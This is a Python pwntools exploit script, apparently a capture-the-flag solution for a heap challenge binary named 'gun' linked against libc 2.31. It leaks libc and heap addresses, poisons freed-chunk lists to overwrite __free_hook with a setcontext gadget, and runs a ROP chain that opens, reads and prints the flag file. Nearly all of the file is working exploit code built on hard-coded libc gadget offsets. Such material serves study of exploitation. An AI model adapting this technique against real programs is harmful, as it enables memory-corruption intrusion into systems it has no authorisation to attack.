import sys

from pwn import *
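# Short aliases over the module-global tube `io`.  `io` is only bound inside
# exp() (via `global io`), so each lambda looks it up at call time, not here.
s = lambda buf: io.send(buf)
sl = lambda buf: io.sendline(buf)
sa = lambda delim, buf: io.sendafter(delim, buf)
sal = lambda delim, buf: io.sendlineafter(delim, buf)
shell = lambda: io.interactive()
r = lambda n=None: io.recv(n)
ra = lambda t=tube.forever: io.recvall(t)
ru = lambda delim: io.recvuntil(delim)
rl = lambda: io.recvline()
rls = lambda n=2**20: io.recvlines(n)

# Target binary and the libc it is resolved against.  Every raw offset used
# later in this file is tied to this exact libc build; pointing libc_path at a
# different build silently invalidates them.
libc_path = "/lib/x86_64-linux-gnu/libc-2.31.so"
elf_path = "./gun"
libc = ELF(libc_path)
elf = ELF(elf_path)

# Previously arch/os were only set when argv[1] was exactly '0' or '1', and a
# missing argument raised IndexError.  Since flat() packs integers using
# context's word size, leaving context unset would produce wrongly sized
# payloads for any other argument, so arch/os are now set unconditionally and
# only the log level depends on argv[1] ('1' -> debug, anything else -> info).
_LOG_LEVELS = {'1': 'debug', '0': 'info'}
_mode = sys.argv[1] if len(sys.argv) > 1 else '0'
context(log_level=_LOG_LEVELS.get(_mode, 'info'), terminal='/bin/zsh', arch='amd64', os='linux')

# Menu prompts of the target, used as delimiters by the helpers below.
cho = b'Action>'
siz = b'Bullet price: '
con = b'Bullet Name:'
# Assigned but not referenced anywhere in this file; kept for compatibility.
ind = ''
edi = ''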
def add(size, content='', c='3'):
    """Pick menu option *c* (default '3') and answer the size and name prompts.

    After sending the option one line is read back; if the target answered
    with its "wrong game command" line the option is sent a second time before
    the size (*size*, sent as a decimal string) and name (*content*) prompts
    are answered.
    """
    sal(cho, c)
    reply = rl()
    if reply == b' wrong game command!\n':
        sal(cho, c)
    sal(siz, str(size))
    sal(con, content)
def add_0(size, content='', c='3'):
    """Pick menu option *c* (default '3') and answer the size and name prompts.

    Unlike add(), no reply line is consumed between the option and the size
    prompt.
    """
    for prompt, answer in ((cho, c), (siz, str(size)), (con, content)):
        sal(prompt, answer)
def free(index, c='1'):
    """Pick menu option *c* (default '1') and answer the "Shoot time: " prompt with *index*."""
    for prompt, answer in ((cho, c), ("Shoot time: ", str(index))):
        sal(prompt, answer)
def load(index, c='2'):
    """Pick menu option *c* (default '2') and answer the load prompt with *index*."""
    for prompt, answer in ((cho, c), ('Which one do you want to load?', str(index))):
        sal(prompt, answer)
def exp():
    """Run the interaction against a local instance of elf_path.

    Starts the process, drives it through the menu helpers (add/add_0/free/
    load), parses two addresses out of its output (libc base and a heap
    address), builds payloads from libc-relative constants, and finally hands
    the tube to the user with shell().  Every numeric constant below is tied
    to the libc build named in libc_path.
    """
    # `io` is global so the module-level send/recv lambdas can see it.
    global io
    io = process([elf_path])
    name = 'a'*0x18
    sa("name:",name)
    add(0x440,'Large chunk(0x440)')
    add_0(0x10,'defense chunk(0x10)')
    load(0)
    free(1)
    add_0(0x10,'backback')
    load(0)
    free(1)
    # Reads up to a 0x7f byte, takes the preceding 6 bytes as a little-endian
    # pointer and subtracts fixed offsets relative to __malloc_hook to obtain
    # the libc base; the 1120 / 0x10 constants are build-specific.
    libc.address = u64(ru(b"\x7f")[-6:].ljust(8,b'\x00')) - 1120 - libc.sym['__malloc_hook'] - 0x10
    success("libc:"+hex(libc.address))
    add_0(0x68,'ScUpax0s')
    add_0(0x68,'ScUpax0s')
    load(0)
    load(1)
    free(2)
    add_0(0x10,'p')
    load(0)
    free(1)
    # Six raw bytes following 'Pwn! The ' are parsed as a pointer; 0x270 is the
    # assumed distance from it to the heap base (build/layout specific).
    ru(b'Pwn! The ')
    heap = u64(r(6).ljust(8,b'\x00')) - 0x270
    success("heap:"+hex(heap))
    add_0(0x68,'ScUpax0s')
    add_0(0x68,'ScUpax0s')
    add_0(0x68,'ScUpax0s')
    add_0(0x68,'ScUpax0s')
    add_0(0x68,'ScUpax0s')
    add_0(0x68,'ScUpax0s')
    add_0(0x68,'ScUpax0s')
    add_0(0x68,'ScUpax0s')
    load(0)
    load(2)
    load(3)
    load(4)
    load(5)
    load(6)
    load(7)
    load(8)
    free(8)
    load(1)
    free(2)
    free_hook = libc.sym['__free_hook']
    success("free_hook:"+hex(free_hook))
    # Symbol plus a fixed byte offset into it; only valid for this libc build.
    setcontext = libc.sym['setcontext']+61
    orw_addr = heap+0x100
    # NOTE: `p` is built but never used below.
    p = p64(0)*4+p64(setcontext)
    frame_addr = heap+0x3d0
    payload = flat(0,frame_addr,p64(0)*2,setcontext)
    ret = 0x0000000000025679+libc.address
    add_0(0x68,'A'*0x10)
    add_0(0x68,flat(p64(0)*6,orw_addr,ret))
    add_0(0x68,'C'*0x10)
    add_0(0x68,'D'*0x10)
    add_0(0x68,'E'*0x10)
    add_0(0x68,'F'*0x10)
    add_0(0x68,'J'*0x10)
    add_0(0x68,p64(heap+0x90))
    add_0(0x68,payload)
    # Libc-relative gadget offsets, hard-coded for the build in libc_path.
    # NOTE: `syscall` is assigned but never used.
    pop_rdi = 0x0000000000026b72+libc.address
    pop_rsi = 0x0000000000027529+libc.address
    pop_rdx_r12 = 0x000000000011c371+libc.address
    syscall = 0x000000000002584d+libc.address
    pop_rax = 0x000000000004a550+libc.address
    # flag_str_addr must point at the './flag\x00' string appended at the end
    # of `orw`, i.e. 0xd8 bytes past orw_addr; flag_addr is the read buffer.
    flag_str_addr = heap+0x100+0xd8
    flag_addr = heap+0x200
    orw = flat(
        pop_rdi,
        flag_str_addr,
        pop_rsi,
        0,
        pop_rax,
        2,
        libc.sym['open'],
        pop_rdi,
        3,
        pop_rsi,
        flag_addr,
        pop_rdx_r12,
        0x100,
        0,
        pop_rax,
        0,
        libc.sym['read'],
        pop_rdi,
        1,
        pop_rsi,
        flag_addr,
        pop_rdx_r12,
        0x100,
        0,
        pop_rax,
        1,
        libc.sym['write'],
        './flag\x00'
    )
    # Logged so the 0xd8 assumption above can be checked against the real length.
    success(hex(len(orw)))
    add_0(0x68,payload)
    add_0(0x68,p64(heap+0x10)*8+p64(heap+0xf8)+p64(heap+0x10)*2+p64(heap+0x28)+p64(heap+0xf8))
    add_0(0x18,'a'*0x18)
    add_0(0xc8,'aaaaaaaaaaa')
    add_0(0x98,p64(heap+0x100))
    load(0)
    load(2)
    load(3)
    load(4)
    load(5)
    free(5)
    add_0(0xe0,orw)
    add_0(0x28,p64(free_hook))
    add_0(0x38,'\x70')
    # Another build-specific libc offset.
    magic_gadget = libc.address+0x0000000000154930
    success("magic:"+hex(magic_gadget))
    add_0(0x38,p64(magic_gadget))
    success("orw:"+hex(heap+0x100))
    load(8)
    shell()
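# Only run when executed directly, so importing the module (e.g. to reuse the
# menu helpers) does not spawn the target process.
if __name__ == "__main__":
    exp()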